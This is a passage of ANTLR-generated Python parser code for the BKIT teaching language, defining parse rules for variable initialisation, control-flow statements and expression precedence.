self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_init\n\n\n\n\n def var_init(self):\n\n localctx = BKITParser.Var_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 18, self.RULE_var_init)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 189\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,16,self._ctx)\n if la_ == 1:\n self.state = 180\n self.match(BKITParser.ID)\n self.state = 184 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 181\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 182\n self.match(BKITParser.INT_LIT)\n self.state = 183\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 186 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n pass\n\n elif la_ == 2:\n self.state = 188\n self.match(BKITParser.ID)\n pass\n\n\n self.state = 191\n self.match(BKITParser.ASSIGN)\n self.state = 194\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.LEFT_BRACE]:\n self.state = 192\n self.array_lit()\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 193\n self.primitive_data()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def composite_var(self):\n return self.getTypedRuleContext(BKITParser.Composite_varContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_init\n\n\n\n\n def composite_init(self):\n\n localctx = BKITParser.Composite_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 20, self.RULE_composite_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 196\n self.composite_var()\n self.state = 197\n self.match(BKITParser.ASSIGN)\n self.state = 198\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_init\n\n\n\n\n def primitive_init(self):\n\n localctx = BKITParser.Primitive_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 22, self.RULE_primitive_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 200\n self.match(BKITParser.ID)\n self.state = 201\n self.match(BKITParser.ASSIGN)\n self.state = 202\n self.primitive_data()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Params_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_params_list\n\n\n\n\n def params_list(self):\n\n localctx = BKITParser.Params_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 24, self.RULE_params_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 204\n self.var_non_init()\n self.state = 209\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 205\n self.match(BKITParser.COMMA)\n self.state = 206\n self.var_non_init()\n self.state = 211\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Stmt_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare_stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declare_stmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declare_stmtContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt_list\n\n\n\n\n def stmt_list(self):\n\n localctx = BKITParser.Stmt_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 26, self.RULE_stmt_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 217\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 212\n self.var_declare_stmt()\n self.state = 213\n self.match(BKITParser.SEMI)\n self.state = 219\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 223\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,20,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n self.state = 220\n self.stmt() \n self.state = 225\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,20,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class StmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def if_stmt(self):\n return self.getTypedRuleContext(BKITParser.If_stmtContext,0)\n\n\n def for_stmt(self):\n return self.getTypedRuleContext(BKITParser.For_stmtContext,0)\n\n\n def while_stmt(self):\n return self.getTypedRuleContext(BKITParser.While_stmtContext,0)\n\n\n def dowhile_stmt(self):\n return self.getTypedRuleContext(BKITParser.Dowhile_stmtContext,0)\n\n\n def assign_stmt(self):\n return self.getTypedRuleContext(BKITParser.Assign_stmtContext,0)\n\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def break_stmt(self):\n return self.getTypedRuleContext(BKITParser.Break_stmtContext,0)\n\n\n def continue_stmt(self):\n return self.getTypedRuleContext(BKITParser.Continue_stmtContext,0)\n\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def return_stmt(self):\n return self.getTypedRuleContext(BKITParser.Return_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt\n\n\n\n\n def stmt(self):\n\n localctx = BKITParser.StmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 28, self.RULE_stmt)\n try:\n self.state = 245\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,21,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 226\n self.if_stmt()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 227\n self.for_stmt()\n pass\n\n elif la_ == 3:\n self.enterOuterAlt(localctx, 3)\n self.state = 228\n self.while_stmt()\n pass\n\n elif la_ == 4:\n self.enterOuterAlt(localctx, 4)\n self.state = 229\n self.dowhile_stmt()\n pass\n\n elif la_ == 5:\n self.enterOuterAlt(localctx, 5)\n self.state = 230\n self.assign_stmt()\n self.state = 231\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 6:\n self.enterOuterAlt(localctx, 6)\n self.state = 233\n self.break_stmt()\n self.state = 234\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 7:\n self.enterOuterAlt(localctx, 7)\n self.state = 236\n self.continue_stmt()\n self.state = 237\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 8:\n self.enterOuterAlt(localctx, 8)\n self.state = 239\n self.call_stmt()\n self.state = 240\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 9:\n self.enterOuterAlt(localctx, 9)\n self.state = 242\n self.return_stmt()\n self.state = 243\n self.match(BKITParser.SEMI)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class If_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def IF(self):\n return self.getToken(BKITParser.IF, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def THEN(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.THEN)\n else:\n return self.getToken(BKITParser.THEN, i)\n\n def stmt_list(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Stmt_listContext)\n else:\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,i)\n\n\n def ENDIF(self):\n return self.getToken(BKITParser.ENDIF, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def ELSEIF(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.ELSEIF)\n else:\n return self.getToken(BKITParser.ELSEIF, i)\n\n def ELSE(self):\n return self.getToken(BKITParser.ELSE, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_if_stmt\n\n\n\n\n def if_stmt(self):\n\n localctx = BKITParser.If_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 30, self.RULE_if_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 247\n self.match(BKITParser.IF)\n self.state = 248\n self.expr()\n self.state = 249\n self.match(BKITParser.THEN)\n self.state = 250\n self.stmt_list()\n self.state = 258\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.ELSEIF:\n self.state = 251\n self.match(BKITParser.ELSEIF)\n self.state = 252\n self.expr()\n self.state = 253\n self.match(BKITParser.THEN)\n self.state = 254\n self.stmt_list()\n self.state = 260\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 263\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.ELSE:\n self.state = 261\n self.match(BKITParser.ELSE)\n self.state = 262\n self.stmt_list()\n\n\n self.state = 265\n self.match(BKITParser.ENDIF)\n self.state = 266\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declare_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare(self):\n return self.getTypedRuleContext(BKITParser.Var_declareContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare_stmt\n\n\n\n\n def var_declare_stmt(self):\n\n localctx = BKITParser.Var_declare_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 32, self.RULE_var_declare_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 268\n self.var_declare()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class For_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FOR(self):\n return self.getToken(BKITParser.FOR, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDFOR(self):\n return self.getToken(BKITParser.ENDFOR, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_for_stmt\n\n\n\n\n def for_stmt(self):\n\n localctx = BKITParser.For_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 34, self.RULE_for_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 270\n self.match(BKITParser.FOR)\n self.state = 271\n self.match(BKITParser.LEFT_PAREN)\n self.state = 272\n self.match(BKITParser.ID)\n self.state = 273\n self.match(BKITParser.ASSIGN)\n self.state = 274\n self.expr()\n self.state = 275\n self.match(BKITParser.COMMA)\n self.state = 276\n self.expr()\n self.state = 277\n self.match(BKITParser.COMMA)\n self.state = 278\n self.expr()\n self.state = 279\n self.match(BKITParser.RIGHT_PAREN)\n self.state = 280\n self.match(BKITParser.DO)\n self.state = 281\n self.stmt_list()\n self.state = 282\n self.match(BKITParser.ENDFOR)\n self.state = 283\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class While_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDWHILE(self):\n return self.getToken(BKITParser.ENDWHILE, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_while_stmt\n\n\n\n\n def while_stmt(self):\n\n localctx = BKITParser.While_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 36, self.RULE_while_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 285\n self.match(BKITParser.WHILE)\n self.state = 286\n self.expr()\n self.state = 287\n self.match(BKITParser.DO)\n self.state = 288\n self.stmt_list()\n self.state = 289\n self.match(BKITParser.ENDWHILE)\n self.state = 290\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Dowhile_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def ENDDO(self):\n return self.getToken(BKITParser.ENDDO, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_dowhile_stmt\n\n\n\n\n def dowhile_stmt(self):\n\n localctx = BKITParser.Dowhile_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 38, self.RULE_dowhile_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 292\n self.match(BKITParser.DO)\n self.state = 293\n self.stmt_list()\n self.state = 294\n self.match(BKITParser.WHILE)\n self.state = 295\n self.expr()\n self.state = 296\n self.match(BKITParser.ENDDO)\n self.state = 297\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Assign_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def composite_var(self):\n return self.getTypedRuleContext(BKITParser.Composite_varContext,0)\n\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_assign_stmt\n\n\n\n\n def assign_stmt(self):\n\n localctx = BKITParser.Assign_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 40, self.RULE_assign_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 301\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,24,self._ctx)\n if la_ == 1:\n self.state = 299\n self.composite_var()\n pass\n\n elif la_ == 2:\n self.state = 300\n self.match(BKITParser.ID)\n pass\n\n\n self.state = 303\n self.match(BKITParser.ASSIGN)\n\n self.state = 304\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Break_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def BREAK(self):\n return self.getToken(BKITParser.BREAK, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_break_stmt\n\n\n\n\n def break_stmt(self):\n\n localctx = BKITParser.Break_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 42, self.RULE_break_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 306\n self.match(BKITParser.BREAK)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Continue_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def CONTINUE(self):\n return self.getToken(BKITParser.CONTINUE, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_continue_stmt\n\n\n\n\n def continue_stmt(self):\n\n localctx = BKITParser.Continue_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 44, self.RULE_continue_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 308\n self.match(BKITParser.CONTINUE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Call_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def function_call(self):\n return self.getTypedRuleContext(BKITParser.Function_callContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_call_stmt\n\n\n\n\n def call_stmt(self):\n\n localctx = BKITParser.Call_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 46, self.RULE_call_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 310\n self.function_call()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Return_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def RETURN(self):\n return self.getToken(BKITParser.RETURN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_return_stmt\n\n\n\n\n def return_stmt(self):\n\n localctx = BKITParser.Return_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 48, self.RULE_return_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 312\n self.match(BKITParser.RETURN)\n self.state = 314\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.UN_LOGICAL_OP) | (1 << BKITParser.UN_OP) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 313\n self.expr()\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ExprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr1(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Expr1Context)\n else:\n return self.getTypedRuleContext(BKITParser.Expr1Context,i)\n\n\n def REL_OP(self):\n return self.getToken(BKITParser.REL_OP, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr\n\n\n\n\n def expr(self):\n\n localctx = BKITParser.ExprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 50, self.RULE_expr)\n try:\n self.state = 321\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,26,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 316\n self.expr1(0)\n self.state = 317\n self.match(BKITParser.REL_OP)\n self.state = 318\n self.expr1(0)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 320\n self.expr1(0)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr1Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def expr1(self):\n return self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def BIN_LOGICAL_OP(self):\n return self.getToken(BKITParser.BIN_LOGICAL_OP, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr1\n\n\n\n def expr1(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr1Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 52\n self.enterRecursionRule(localctx, 52, self.RULE_expr1, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 324\n self.expr2(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 331\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,27,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr1Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr1)\n self.state = 326\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 327\n self.match(BKITParser.BIN_LOGICAL_OP)\n self.state = 328\n self.expr2(0) \n self.state = 333\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,27,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr2Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def ADD_OP(self):\n return self.getToken(BKITParser.ADD_OP, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr2\n\n\n\n def expr2(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr2Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 54\n self.enterRecursionRule(localctx, 54, self.RULE_expr2, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 335\n self.expr3(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 342\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,28,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr2Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr2)\n self.state = 337\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 338\n self.match(BKITParser.ADD_OP)\n self.state = 339\n self.expr3(0) \n self.state = 344\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,28,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr3Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def MUL_OP(self):\n return self.getToken(BKITParser.MUL_OP, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr3\n\n\n\n def expr3(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr3Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 56\n self.enterRecursionRule(localctx, 56, self.RULE_expr3, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 346\n self.expr4()\n self._ctx.stop = self._input.LT(-1)\n self.state = 353\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,29,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr3Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr3)\n self.state = 348\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 349\n self.match(BKITParser.MUL_OP)\n self.state = 350\n self.expr4() \n self.state = 355\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,29,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr4Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def UN_LOGICAL_OP(self):\n return self.getToken(BKITParser.UN_LOGICAL_OP, 0)\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr4\n\n\n\n\n def expr4(self):\n\n localctx = BKITParser.Expr4Context(self, self._ctx, self.state)\n self.enterRule(localctx, 58, self.RULE_expr4)\n try:\n self.state = 359\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.UN_LOGICAL_OP]:\n self.enterOuterAlt(localctx, 1)\n self.state = 356\n self.match(BKITParser.UN_LOGICAL_OP)\n self.state = 357\n self.expr4()\n pass\n elif token in [BKITParser.ID, BKITParser.UN_OP, BKITParser.INT_LIT, 